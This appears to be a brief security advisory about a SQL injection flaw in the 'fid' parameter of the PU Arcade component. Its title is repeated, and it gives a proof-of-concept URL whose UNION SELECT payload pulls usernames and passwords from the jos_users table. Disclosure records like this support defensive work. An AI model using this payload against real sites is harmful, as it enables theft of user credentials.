Pragmatic Utopia PU Arcade 'fid' parameter SQL Injection Vulnerability

Pragmatic Utopia PU Arcade 'fid' parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example..com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--